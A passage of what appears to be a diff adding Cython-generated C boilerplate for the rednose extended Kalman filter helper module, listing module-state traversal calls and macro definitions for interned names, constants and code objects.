Py_VISIT(traverse_module_state->__pyx_n_s_start); + Py_VISIT(traverse_module_state->__pyx_n_s_state); + Py_VISIT(traverse_module_state->__pyx_n_s_state_b); + Py_VISIT(traverse_module_state->__pyx_n_s_step); + Py_VISIT(traverse_module_state->__pyx_n_s_stop); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_direct); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_direct_or_indirect); + Py_VISIT(traverse_module_state->__pyx_kp_s_strided_and_indirect); + Py_VISIT(traverse_module_state->__pyx_kp_s_stringsource); + Py_VISIT(traverse_module_state->__pyx_n_s_struct); + Py_VISIT(traverse_module_state->__pyx_n_s_sys); + Py_VISIT(traverse_module_state->__pyx_n_s_t); + Py_VISIT(traverse_module_state->__pyx_n_s_test); + Py_VISIT(traverse_module_state->__pyx_n_s_tmpvec); + Py_VISIT(traverse_module_state->__pyx_kp_s_unable_to_allocate_array_data); + Py_VISIT(traverse_module_state->__pyx_kp_s_unable_to_allocate_shape_and_str); + Py_VISIT(traverse_module_state->__pyx_n_s_unpack); + Py_VISIT(traverse_module_state->__pyx_n_s_update); + Py_VISIT(traverse_module_state->__pyx_n_u_utf8); + Py_VISIT(traverse_module_state->__pyx_n_s_val); + Py_VISIT(traverse_module_state->__pyx_n_s_version_info); + Py_VISIT(traverse_module_state->__pyx_n_s_x); + Py_VISIT(traverse_module_state->__pyx_n_s_x_initial); + Py_VISIT(traverse_module_state->__pyx_n_s_z); + Py_VISIT(traverse_module_state->__pyx_n_s_z_map); + Py_VISIT(traverse_module_state->__pyx_n_s_zi); + Py_VISIT(traverse_module_state->__pyx_n_s_zi_b); + Py_VISIT(traverse_module_state->__pyx_float_0_95); + Py_VISIT(traverse_module_state->__pyx_int_0); + Py_VISIT(traverse_module_state->__pyx_int_1); + Py_VISIT(traverse_module_state->__pyx_int_3); + Py_VISIT(traverse_module_state->__pyx_int_112105877); + Py_VISIT(traverse_module_state->__pyx_int_136983863); + Py_VISIT(traverse_module_state->__pyx_int_184977713); + Py_VISIT(traverse_module_state->__pyx_int_neg_1); + Py_VISIT(traverse_module_state->__pyx_k__17); + Py_VISIT(traverse_module_state->__pyx_k__18); + Py_VISIT(traverse_module_state->__pyx_k__19); + Py_VISIT(traverse_module_state->__pyx_k__28); + Py_VISIT(traverse_module_state->__pyx_k__33); + Py_VISIT(traverse_module_state->__pyx_slice__5); + Py_VISIT(traverse_module_state->__pyx_tuple__4); + Py_VISIT(traverse_module_state->__pyx_tuple__8); + Py_VISIT(traverse_module_state->__pyx_tuple__15); + Py_VISIT(traverse_module_state->__pyx_tuple__16); + Py_VISIT(traverse_module_state->__pyx_tuple__37); + Py_VISIT(traverse_module_state->__pyx_tuple__38); + Py_VISIT(traverse_module_state->__pyx_tuple__39); + Py_VISIT(traverse_module_state->__pyx_tuple__40); + Py_VISIT(traverse_module_state->__pyx_tuple__41); + Py_VISIT(traverse_module_state->__pyx_tuple__42); + Py_VISIT(traverse_module_state->__pyx_tuple__43); + Py_VISIT(traverse_module_state->__pyx_tuple__44); + Py_VISIT(traverse_module_state->__pyx_tuple__45); + Py_VISIT(traverse_module_state->__pyx_tuple__46); + Py_VISIT(traverse_module_state->__pyx_tuple__48); + Py_VISIT(traverse_module_state->__pyx_tuple__49); + Py_VISIT(traverse_module_state->__pyx_tuple__50); + Py_VISIT(traverse_module_state->__pyx_tuple__51); + Py_VISIT(traverse_module_state->__pyx_tuple__52); + Py_VISIT(traverse_module_state->__pyx_tuple__53); + Py_VISIT(traverse_module_state->__pyx_tuple__54); + Py_VISIT(traverse_module_state->__pyx_tuple__55); + Py_VISIT(traverse_module_state->__pyx_tuple__56); + Py_VISIT(traverse_module_state->__pyx_tuple__57); + Py_VISIT(traverse_module_state->__pyx_codeobj__20); + Py_VISIT(traverse_module_state->__pyx_codeobj__21); + Py_VISIT(traverse_module_state->__pyx_codeobj__22); + Py_VISIT(traverse_module_state->__pyx_codeobj__23); + Py_VISIT(traverse_module_state->__pyx_codeobj__24); + Py_VISIT(traverse_module_state->__pyx_codeobj__25); + Py_VISIT(traverse_module_state->__pyx_codeobj__26); + Py_VISIT(traverse_module_state->__pyx_codeobj__27); + Py_VISIT(traverse_module_state->__pyx_codeobj__29); + Py_VISIT(traverse_module_state->__pyx_codeobj__30); + Py_VISIT(traverse_module_state->__pyx_codeobj__31); + Py_VISIT(traverse_module_state->__pyx_codeobj__32); + Py_VISIT(traverse_module_state->__pyx_codeobj__34); + Py_VISIT(traverse_module_state->__pyx_codeobj__35); + Py_VISIT(traverse_module_state->__pyx_codeobj__36); + Py_VISIT(traverse_module_state->__pyx_codeobj__47); + return 0; +} +#endif +/* #### Code section: module_state_defines ### */ +#define __pyx_d __pyx_mstate_global->__pyx_d +#define __pyx_b __pyx_mstate_global->__pyx_b +#define __pyx_cython_runtime __pyx_mstate_global->__pyx_cython_runtime +#define __pyx_empty_tuple __pyx_mstate_global->__pyx_empty_tuple +#define __pyx_empty_bytes __pyx_mstate_global->__pyx_empty_bytes +#define __pyx_empty_unicode __pyx_mstate_global->__pyx_empty_unicode +#ifdef __Pyx_CyFunction_USED +#define __pyx_CyFunctionType __pyx_mstate_global->__pyx_CyFunctionType +#endif +#ifdef __Pyx_FusedFunction_USED +#define __pyx_FusedFunctionType __pyx_mstate_global->__pyx_FusedFunctionType +#endif +#ifdef __Pyx_Generator_USED +#define __pyx_GeneratorType __pyx_mstate_global->__pyx_GeneratorType +#endif +#ifdef __Pyx_IterableCoroutine_USED +#define __pyx_IterableCoroutineType __pyx_mstate_global->__pyx_IterableCoroutineType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineAwaitType __pyx_mstate_global->__pyx_CoroutineAwaitType +#endif +#ifdef __Pyx_Coroutine_USED +#define __pyx_CoroutineType __pyx_mstate_global->__pyx_CoroutineType +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_ptype_7cpython_4type_type __pyx_mstate_global->__pyx_ptype_7cpython_4type_type +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#if CYTHON_USE_MODULE_STATE +#endif +#define __pyx_ptype_5numpy_dtype __pyx_mstate_global->__pyx_ptype_5numpy_dtype +#define __pyx_ptype_5numpy_flatiter __pyx_mstate_global->__pyx_ptype_5numpy_flatiter +#define __pyx_ptype_5numpy_broadcast __pyx_mstate_global->__pyx_ptype_5numpy_broadcast +#define __pyx_ptype_5numpy_ndarray __pyx_mstate_global->__pyx_ptype_5numpy_ndarray +#define __pyx_ptype_5numpy_generic __pyx_mstate_global->__pyx_ptype_5numpy_generic +#define __pyx_ptype_5numpy_number __pyx_mstate_global->__pyx_ptype_5numpy_number +#define __pyx_ptype_5numpy_integer __pyx_mstate_global->__pyx_ptype_5numpy_integer +#define __pyx_ptype_5numpy_signedinteger __pyx_mstate_global->__pyx_ptype_5numpy_signedinteger +#define __pyx_ptype_5numpy_unsignedinteger __pyx_mstate_global->__pyx_ptype_5numpy_unsignedinteger +#define __pyx_ptype_5numpy_inexact __pyx_mstate_global->__pyx_ptype_5numpy_inexact +#define __pyx_ptype_5numpy_floating __pyx_mstate_global->__pyx_ptype_5numpy_floating +#define __pyx_ptype_5numpy_complexfloating __pyx_mstate_global->__pyx_ptype_5numpy_complexfloating +#define __pyx_ptype_5numpy_flexible __pyx_mstate_global->__pyx_ptype_5numpy_flexible +#define __pyx_ptype_5numpy_character __pyx_mstate_global->__pyx_ptype_5numpy_character +#define __pyx_ptype_5numpy_ufunc __pyx_mstate_global->__pyx_ptype_5numpy_ufunc +#if CYTHON_USE_MODULE_STATE +#define __pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx __pyx_mstate_global->__pyx_type_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx +#define __pyx_type___pyx_array __pyx_mstate_global->__pyx_type___pyx_array +#define __pyx_type___pyx_MemviewEnum __pyx_mstate_global->__pyx_type___pyx_MemviewEnum +#define __pyx_type___pyx_memoryview __pyx_mstate_global->__pyx_type___pyx_memoryview +#define __pyx_type___pyx_memoryviewslice __pyx_mstate_global->__pyx_type___pyx_memoryviewslice +#endif +#define __pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx __pyx_mstate_global->__pyx_ptype_7rednose_7helpers_11ekf_sym_pyx_EKF_sym_pyx +#define __pyx_array_type __pyx_mstate_global->__pyx_array_type +#define __pyx_MemviewEnum_type __pyx_mstate_global->__pyx_MemviewEnum_type +#define __pyx_memoryview_type __pyx_mstate_global->__pyx_memoryview_type +#define __pyx_memoryviewslice_type __pyx_mstate_global->__pyx_memoryviewslice_type +#define __pyx_kp_u_ __pyx_mstate_global->__pyx_kp_u_ +#define __pyx_n_s_ASCII __pyx_mstate_global->__pyx_n_s_ASCII +#define __pyx_kp_s_All_dimensions_preceding_dimensi __pyx_mstate_global->__pyx_kp_s_All_dimensions_preceding_dimensi +#define __pyx_n_s_AssertionError __pyx_mstate_global->__pyx_n_s_AssertionError +#define __pyx_kp_s_Buffer_view_does_not_expose_stri __pyx_mstate_global->__pyx_kp_s_Buffer_view_does_not_expose_stri +#define __pyx_n_u_C __pyx_mstate_global->__pyx_n_u_C +#define __pyx_kp_s_Can_only_create_a_buffer_that_is __pyx_mstate_global->__pyx_kp_s_Can_only_create_a_buffer_that_is +#define __pyx_kp_s_Cannot_assign_to_read_only_memor __pyx_mstate_global->__pyx_kp_s_Cannot_assign_to_read_only_memor +#define __pyx_kp_s_Cannot_create_writable_memory_vi __pyx_mstate_global->__pyx_kp_s_Cannot_create_writable_memory_vi +#define __pyx_kp_u_Cannot_index_with_type __pyx_mstate_global->__pyx_kp_u_Cannot_index_with_type +#define __pyx_kp_s_Cannot_transpose_memoryview_with __pyx_mstate_global->__pyx_kp_s_Cannot_transpose_memoryview_with +#define __pyx_kp_s_Dimension_d_is_not_direct __pyx_mstate_global->__pyx_kp_s_Dimension_d_is_not_direct +#define __pyx_n_s_EKF_sym_pyx __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx +#define __pyx_n_s_EKF_sym_pyx___reduce_cython __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx___reduce_cython +#define __pyx_n_s_EKF_sym_pyx___setstate_cython __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx___setstate_cython +#define __pyx_n_s_EKF_sym_pyx_augment __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_augment +#define __pyx_n_s_EKF_sym_pyx_covs __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_covs +#define __pyx_n_s_EKF_sym_pyx_get_augment_times __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_get_augment_times +#define __pyx_n_s_EKF_sym_pyx_get_filter_time __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_get_filter_time +#define __pyx_n_s_EKF_sym_pyx_init_state __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_init_state +#define __pyx_n_s_EKF_sym_pyx_maha_test __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_maha_test +#define __pyx_n_s_EKF_sym_pyx_predict __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_predict +#define __pyx_n_s_EKF_sym_pyx_predict_and_update_b __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_predict_and_update_b +#define __pyx_n_s_EKF_sym_pyx_reset_rewind __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_reset_rewind +#define __pyx_n_s_EKF_sym_pyx_rts_smooth __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_rts_smooth +#define __pyx_n_s_EKF_sym_pyx_set_filter_time __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_set_filter_time +#define __pyx_n_s_EKF_sym_pyx_set_global __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_set_global +#define __pyx_n_s_EKF_sym_pyx_state __pyx_mstate_global->__pyx_n_s_EKF_sym_pyx_state +#define __pyx_n_s_Ellipsis __pyx_mstate_global->__pyx_n_s_Ellipsis +#define __pyx_kp_s_Empty_shape_tuple_for_cython_arr __pyx_mstate_global->__pyx_kp_s_Empty_shape_tuple_for_cython_arr +#define __pyx_n_s_ImportError __pyx_mstate_global->__pyx_n_s_ImportError +#define __pyx_kp_s_Incompatible_checksums_0x_x_vs_0 __pyx_mstate_global->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0 +#define __pyx_n_s_IndexError __pyx_mstate_global->__pyx_n_s_IndexError +#define __pyx_kp_s_Index_out_of_bounds_axis_d __pyx_mstate_global->__pyx_kp_s_Index_out_of_bounds_axis_d +#define __pyx_kp_s_Indirect_dimensions_not_supporte __pyx_mstate_global->__pyx_kp_s_Indirect_dimensions_not_supporte +#define __pyx_kp_u_Invalid_mode_expected_c_or_fortr __pyx_mstate_global->__pyx_kp_u_Invalid_mode_expected_c_or_fortr +#define __pyx_kp_u_Invalid_shape_in_axis __pyx_mstate_global->__pyx_kp_u_Invalid_shape_in_axis +#define __pyx_n_s_MemoryError __pyx_mstate_global->__pyx_n_s_MemoryError +#define __pyx_kp_s_MemoryView_of_r_at_0x_x __pyx_mstate_global->__pyx_kp_s_MemoryView_of_r_at_0x_x +#define __pyx_kp_s_MemoryView_of_r_object __pyx_mstate_global->__pyx_kp_s_MemoryView_of_r_object +#define __pyx_n_s_N __pyx_mstate_global->__pyx_n_s_N +#define __pyx_n_s_NotImplementedError __pyx_mstate_global->__pyx_n_s_NotImplementedError +#define __pyx_n_b_O __pyx_mstate_global->__pyx_n_b_O +#define __pyx_kp_u_Out_of_bounds_on_buffer_access_a __pyx_mstate_global->__pyx_kp_u_Out_of_bounds_on_buffer_access_a +#define __pyx_n_s_P __pyx_mstate_global->__pyx_n_s_P +#define __pyx_n_s_P_initial __pyx_mstate_global->__pyx_n_s_P_initial +#define __pyx_n_s_PickleError __pyx_mstate_global->__pyx_n_s_PickleError +#define __pyx_n_s_Q __pyx_mstate_global->__pyx_n_s_Q +#define __pyx_n_s_R __pyx_mstate_global->__pyx_n_s_R +#define __pyx_n_s_R_map __pyx_mstate_global->__pyx_n_s_R_map +#define __pyx_n_s_Ri __pyx_mstate_global->__pyx_n_s_Ri +#define __pyx_n_s_Ri_b __pyx_mstate_global->__pyx_n_s_Ri_b +#define __pyx_n_s_Sequence __pyx_mstate_global->__pyx_n_s_Sequence +#define __pyx_kp_s_Step_may_not_be_zero_axis_d __pyx_mstate_global->__pyx_kp_s_Step_may_not_be_zero_axis_d +#define __pyx_kp_b_T __pyx_mstate_global->__pyx_kp_b_T +#define __pyx_n_s_TypeError __pyx_mstate_global->__pyx_n_s_TypeError +#define __pyx_kp_s_Unable_to_convert_item_to_object __pyx_mstate_global->__pyx_kp_s_Unable_to_convert_item_to_object +#define __pyx_n_s_ValueError __pyx_mstate_global->__pyx_n_s_ValueError +#define __pyx_n_s_View_MemoryView __pyx_mstate_global->__pyx_n_s_View_MemoryView +#define __pyx_kp_b__10 __pyx_mstate_global->__pyx_kp_b__10 +#define __pyx_kp_b__11 __pyx_mstate_global->__pyx_kp_b__11 +#define __pyx_kp_b__12 __pyx_mstate_global->__pyx_kp_b__12 +#define __pyx_kp_u__13 __pyx_mstate_global->__pyx_kp_u__13 +#define __pyx_kp_u__14 __pyx_mstate_global->__pyx_kp_u__14 +#define __pyx_kp_u__2 __pyx_mstate_global->__pyx_kp_u__2 +#define __pyx_n_s__3 __pyx_mstate_global->__pyx_n_s__3 +#define __pyx_n_s__58 __pyx_mstate_global->__pyx_n_s__58 +#define __pyx_kp_u__6 __pyx_mstate_global->__pyx_kp_u__6 +#define __pyx_kp_u__7 __pyx_mstate_global->__pyx_kp_u__7 +#define __pyx_kp_b__9 __pyx_mstate_global->__pyx_kp_b__9 +#define __pyx_n_s_a __pyx_mstate_global->__pyx_n_s_a +#define __pyx_n_s_abc __pyx_mstate_global->__pyx_n_s_abc +#define __pyx_n_s_allocate_buffer __pyx_mstate_global->__pyx_n_s_allocate_buffer +#define __pyx_kp_u_and __pyx_mstate_global->__pyx_kp_u_and +#define __pyx_n_s_args __pyx_mstate_global->__pyx_n_s_args +#define __pyx_n_s_args_map __pyx_mstate_global->__pyx_n_s_args_map +#define __pyx_n_s_asarray __pyx_mstate_global->__pyx_n_s_asarray +#define __pyx_n_s_ascontiguousarray __pyx_mstate_global->__pyx_n_s_ascontiguousarray +#define __pyx_n_s_asyncio_coroutines __pyx_mstate_global->__pyx_n_s_asyncio_coroutines +#define __pyx_n_s_augment __pyx_mstate_global->__pyx_n_s_augment +#define __pyx_n_s_base __pyx_mstate_global->__pyx_n_s_base +#define __pyx_n_s_c __pyx_mstate_global->__pyx_n_s_c +#define __pyx_n_u_c __pyx_mstate_global->__pyx_n_u_c +#define __pyx_n_s_class __pyx_mstate_global->__pyx_n_s_class +#define __pyx_n_s_class_getitem __pyx_mstate_global->__pyx_n_s_class_getitem +#define __pyx_n_s_cline_in_traceback __pyx_mstate_global->__pyx_n_s_cline_in_traceback +#define __pyx_n_s_collections __pyx_mstate_global->__pyx_n_s_collections +#define __pyx_kp_s_collections_abc __pyx_mstate_global->__pyx_kp_s_collections_abc +#define __pyx_kp_s_contiguous_and_direct __pyx_mstate_global->__pyx_kp_s_contiguous_and_direct +#define __pyx_kp_s_contiguous_and_indirect __pyx_mstate_global->__pyx_kp_s_contiguous_and_indirect +#define __pyx_n_s_copy __pyx_mstate_global->__pyx_n_s_copy +#define __pyx_n_s_count __pyx_mstate_global->__pyx_n_s_count +#define __pyx_n_s_covs __pyx_mstate_global->__pyx_n_s_covs +#define __pyx_n_s_covs_b __pyx_mstate_global->__pyx_n_s_covs_b +#define __pyx_n_s_dict __pyx_mstate_global->__pyx_n_s_dict +#define __pyx_n_s_dim_augment __pyx_mstate_global->__pyx_n_s_dim_augment +#define __pyx_n_s_dim_augment_err __pyx_mstate_global->__pyx_n_s_dim_augment_err +#define __pyx_n_s_dim_main __pyx_mstate_global->__pyx_n_s_dim_main +#define __pyx_n_s_dim_main_err __pyx_mstate_global->__pyx_n_s_dim_main_err +#define __pyx_kp_u_disable __pyx_mstate_global->__pyx_kp_u_disable +#define __pyx_n_s_double __pyx_mstate_global->__pyx_n_s_double +#define __pyx_n_s_dtype __pyx_mstate_global->__pyx_n_s_dtype +#define __pyx_n_s_dtype_is_object __pyx_mstate_global->__pyx_n_s_dtype_is_object +#define __pyx_kp_u_enable __pyx_mstate_global->__pyx_kp_u_enable +#define __pyx_n_s_encode __pyx_mstate_global->__pyx_n_s_encode +#define __pyx_n_s_enumerate __pyx_mstate_global->__pyx_n_s_enumerate +#define __pyx_n_s_error __pyx_mstate_global->__pyx_n_s_error +#define __pyx_n_s_estimates __pyx_mstate_global->__pyx_n_s_estimates +#define __pyx_n_s_extra_args __pyx_mstate_global->__pyx_n_s_extra_args +#define __pyx_n_s_extra_args_map __pyx_mstate_global->__pyx_n_s_extra_args_map +#define __pyx_n_s_filter_time __pyx_mstate_global->__pyx_n_s_filter_time +#define __pyx_n_s_flags __pyx_mstate_global->__pyx_n_s_flags +#define __pyx_n_s_format __pyx_mstate_global->__pyx_n_s_format +#define __pyx_n_s_fortran __pyx_mstate_global->__pyx_n_s_fortran +#define __pyx_n_u_fortran __pyx_mstate_global->__pyx_n_u_fortran +#define __pyx_kp_u_gc __pyx_mstate_global->__pyx_kp_u_gc +#define __pyx_n_s_gen_dir __pyx_mstate_global->__pyx_n_s_gen_dir +#define __pyx_n_s_get_augment_times __pyx_mstate_global->__pyx_n_s_get_augment_times +#define __pyx_n_s_get_filter_time __pyx_mstate_global->__pyx_n_s_get_filter_time +#define __pyx_n_s_getstate __pyx_mstate_global->__pyx_n_s_getstate +#define __pyx_n_s_global_var __pyx_mstate_global->__pyx_n_s_global_var +#define __pyx_n_s_global_vars __pyx_mstate_global->__pyx_n_s_global_vars +#define __pyx_kp_u_got __pyx_mstate_global->__pyx_kp_u_got +#define __pyx_kp_u_got_differing_extents_in_dimensi __pyx_mstate_global->__pyx_kp_u_got_differing_extents_in_dimensi +#define __pyx_n_s_id __pyx_mstate_global->__pyx_n_s_id +#define __pyx_n_s_import __pyx_mstate_global->__pyx_n_s_import +#define __pyx_n_s_index __pyx_mstate_global->__pyx_n_s_index +#define __pyx_n_s_init_state __pyx_mstate_global->__pyx_n_s_init_state +#define __pyx_n_s_initializing __pyx_mstate_global->__pyx_n_s_initializing +#define __pyx_n_s_is_coroutine __pyx_mstate_global->__pyx_n_s_is_coroutine +#define __pyx_kp_u_isenabled __pyx_mstate_global->__pyx_kp_u_isenabled +#define __pyx_n_s_itemsize __pyx_mstate_global->__pyx_n_s_itemsize +#define __pyx_kp_s_itemsize_0_for_cython_array __pyx_mstate_global->__pyx_kp_s_itemsize_0_for_cython_array +#define __pyx_n_s_join __pyx_mstate_global->__pyx_n_s_join +#define __pyx_n_s_kind __pyx_mstate_global->__pyx_n_s_kind +#define __pyx_n_s_logger __pyx_mstate_global->__pyx_n_s_logger +#define __pyx_n_s_maha_test __pyx_mstate_global->__pyx_n_s_maha_test +#define __pyx_n_s_maha_test_kinds __pyx_mstate_global->__pyx_n_s_maha_test_kinds +#define __pyx_n_s_maha_thresh __pyx_mstate_global->__pyx_n_s_maha_thresh +#define __pyx_n_s_main __pyx_mstate_global->__pyx_n_s_main +#define __pyx_n_s_max_rewind_age __pyx_mstate_global->__pyx_n_s_max_rewind_age +#define __pyx_n_s_memview __pyx_mstate_global->__pyx_n_s_memview +#define __pyx_n_s_mode __pyx_mstate_global->__pyx_n_s_mode +#define __pyx_n_s_name __pyx_mstate_global->__pyx_n_s_name +#define __pyx_n_s_name_2 __pyx_mstate_global->__pyx_n_s_name_2 +#define __pyx_n_s_nan __pyx_mstate_global->__pyx_n_s_nan +#define __pyx_n_s_ndim __pyx_mstate_global->__pyx_n_s_ndim +#define __pyx_n_s_new __pyx_mstate_global->__pyx_n_s_new +#define __pyx_kp_s_no_default___reduce___due_to_non __pyx_mstate_global->__pyx_kp_s_no_default___reduce___due_to_non +#define __pyx_n_s_norm_quats __pyx_mstate_global->__pyx_n_s_norm_quats +#define __pyx_n_s_np __pyx_mstate_global->__pyx_n_s_np +#define __pyx_n_s_numpy __pyx_mstate_global->__pyx_n_s_numpy +#define __pyx_kp_u_numpy_core_multiarray_failed_to __pyx_mstate_global->__pyx_kp_u_numpy_core_multiarray_failed_to +#define __pyx_kp_u_numpy_core_umath_failed_to_impor __pyx_mstate_global->__pyx_kp_u_numpy_core_umath_failed_to_impor +#define __pyx_n_s_obj __pyx_mstate_global->__pyx_n_s_obj +#define __pyx_n_s_order __pyx_mstate_global->__pyx_n_s_order +#define __pyx_n_s_pack __pyx_mstate_global->__pyx_n_s_pack +#define __pyx_n_s_pickle __pyx_mstate_global->__pyx_n_s_pickle +#define __pyx_n_s_predict __pyx_mstate_global->__pyx_n_s_predict +#define __pyx_n_s_predict_and_update_batch __pyx_mstate_global->__pyx_n_s_predict_and_update_batch +#define __pyx_n_s_pyx_PickleError __pyx_mstate_global->__pyx_n_s_pyx_PickleError +#define __pyx_n_s_pyx_checksum __pyx_mstate_global->__pyx_n_s_pyx_checksum +#define __pyx_n_s_pyx_result __pyx_mstate_global->__pyx_n_s_pyx_result +#define __pyx_n_s_pyx_state __pyx_mstate_global->__pyx_n_s_pyx_state +#define __pyx_n_s_pyx_type __pyx_mstate_global->__pyx_n_s_pyx_type +#define __pyx_n_s_pyx_unpickle_Enum __pyx_mstate_global->__pyx_n_s_pyx_unpickle_Enum +#define __pyx_n_s_pyx_vtable __pyx_mstate_global->__pyx_n_s_pyx_vtable +#define __pyx_n_s_quaternion_idxs __pyx_mstate_global->__pyx_n_s_quaternion_idxs +#define __pyx_n_s_range __pyx_mstate_global->__pyx_n_s_range +#define __pyx_n_s_rednose_helpers_ekf_sym_pyx __pyx_mstate_global->__pyx_n_s_rednose_helpers_ekf_sym_pyx +#define __pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx __pyx_mstate_global->__pyx_kp_s_rednose_helpers_ekf_sym_pyx_pyx +#define __pyx_n_s_reduce __pyx_mstate_global->__pyx_n_s_reduce +#define __pyx_n_s_reduce_cython __pyx_mstate_global->__pyx_n_s_reduce_cython +#define __pyx_n_s_reduce_ex __pyx_mstate_global->__pyx_n_s_reduce_ex +#define __pyx_n_s_register __pyx_mstate_global->__pyx_n_s_register +#define __pyx_n_s_res __pyx_mstate_global->__pyx_n_s_res +#define __pyx_n_s_reset_rewind __pyx_mstate_global->__pyx_n_s_reset_rewind +#define __pyx_n_s_rts_smooth __pyx_mstate_global->__pyx_n_s_rts_smooth +#define __pyx_n_s_self __pyx_mstate_global->__pyx_n_s_self +#define __pyx_n_s_set_filter_time __pyx_mstate_global->__pyx_n_s_set_filter_time +#define __pyx_n_s_set_global __pyx_mstate_global->__pyx_n_s_set_global +#define __pyx_n_s_setstate __pyx_mstate_global->__pyx_n_s_setstate +#define __pyx_n_s_setstate_cython __pyx_mstate_global->__pyx_n_s_setstate_cython +#define __pyx_n_s_shape __pyx_mstate_global->__pyx_n_s_shape +#define __pyx_n_s_size __pyx_mstate_global->__pyx_n_s_size +#define __pyx_n_s_spec __pyx_mstate_global->__pyx_n_s_spec +#define __pyx_n_s_start __pyx_mstate_global->__pyx_n_s_start +#define __pyx_n_s_state __pyx_mstate_global->__pyx_n_s_state +#define __pyx_n_s_state_b __pyx_mstate_global->__pyx_n_s_state_b +#define __pyx_n_s_step __pyx_mstate_global->__pyx_n_s_step +#define __pyx_n_s_stop __pyx_mstate_global->__pyx_n_s_stop +#define __pyx_kp_s_strided_and_direct __pyx_mstate_global->__pyx_kp_s_strided_and_direct +#define __pyx_kp_s_strided_and_direct_or_indirect __pyx_mstate_global->__pyx_kp_s_strided_and_direct_or_indirect +#define __pyx_kp_s_strided_and_indirect __pyx_mstate_global->__pyx_kp_s_strided_and_indirect +#define __pyx_kp_s_stringsource __pyx_mstate_global->__pyx_kp_s_stringsource +#define __pyx_n_s_struct __pyx_mstate_global->__pyx_n_s_struct +#define __pyx_n_s_sys __pyx_mstate_global->__pyx_n_s_sys +#define __pyx_n_s_t __pyx_mstate_global->__pyx_n_s_t +#define __pyx_n_s_test __pyx_mstate_global->__pyx_n_s_test +#define __pyx_n_s_tmpvec __pyx_mstate_global->__pyx_n_s_tmpvec +#define __pyx_kp_s_unable_to_allocate_array_data __pyx_mstate_global->__pyx_kp_s_unable_to_allocate_array_data +#define __pyx_kp_s_unable_to_allocate_shape_and_str __pyx_mstate_global->__pyx_kp_s_unable_to_allocate_shape_and_str +#define __pyx_n_s_unpack __pyx_mstate_global->__pyx_n_s_unpack +#define __pyx_n_s_update __pyx_mstate_global->__pyx_n_s_update +#define __pyx_n_u_utf8 __pyx_mstate_global->__pyx_n_u_utf8 +#define __pyx_n_s_val __pyx_mstate_global->__pyx_n_s_val +#define __pyx_n_s_version_info __pyx_mstate_global->__pyx_n_s_version_info +#define __pyx_n_s_x __pyx_mstate_global->__pyx_n_s_x +#define __pyx_n_s_x_initial __pyx_mstate_global->__pyx_n_s_x_initial +#define __pyx_n_s_z __pyx_mstate_global->__pyx_n_s_z +#define __pyx_n_s_z_map __pyx_mstate_global->__pyx_n_s_z_map +#define __pyx_n_s_zi __pyx_mstate_global->__pyx_n_s_zi +#define __pyx_n_s_zi_b __pyx_mstate_global->__pyx_n_s_zi_b +#define __pyx_float_0_95 __pyx_mstate_global->__pyx_float_0_95 +#define __pyx_int_0 __pyx_mstate_global->__pyx_int_0 +#define __pyx_int_1 __pyx_mstate_global->__pyx_int_1 +#define __pyx_int_3 __pyx_mstate_global->__pyx_int_3 +#define __pyx_int_112105877 __pyx_mstate_global->__pyx_int_112105877 +#define __pyx_int_136983863 __pyx_mstate_global->__pyx_int_136983863 +#define __pyx_int_184977713 __pyx_mstate_global->__pyx_int_184977713 +#define __pyx_int_neg_1 __pyx_mstate_global->__pyx_int_neg_1 +#define __pyx_k__17 __pyx_mstate_global->__pyx_k__17 +#define __pyx_k__18 __pyx_mstate_global->__pyx_k__18 +#define __pyx_k__19 __pyx_mstate_global->__pyx_k__19 +#define __pyx_k__28 __pyx_mstate_global->__pyx_k__28 +#define __pyx_k__33 __pyx_mstate_global->__pyx_k__33 +#define __pyx_slice__5 __pyx_mstate_global->__pyx_slice__5 +#define __pyx_tuple__4 __pyx_mstate_global->__pyx_tuple__4 +#define __pyx_tuple__8 __pyx_mstate_global->__pyx_tuple__8 +#define __pyx_tuple__15 __pyx_mstate_global->__pyx_tuple__15 +#define __pyx_tuple__16 __pyx_mstate_global->__pyx_tuple__16 +#define __pyx_tuple__37 __pyx_mstate_global->__pyx_tuple__37 +#define __pyx_tuple__38 __pyx_mstate_global->__pyx_tuple__38 +#define __pyx_tuple__39 __pyx_mstate_global->__pyx_tuple__39 +#define __pyx_tuple__40 __pyx_mstate_global->__pyx_tuple__40 +#define __pyx_tuple__41 __pyx_mstate_global->__pyx_tuple__41 +#define __pyx_tuple__42 __pyx_mstate_global->__pyx_tuple__42 +#define __pyx_tuple__43 __pyx_mstate_global->__pyx_tuple__43 +#define __pyx_tuple__44 __pyx_mstate_global->__pyx_tuple__44 +#define __pyx_tuple__45 __pyx_mstate_global->__pyx_tuple__45 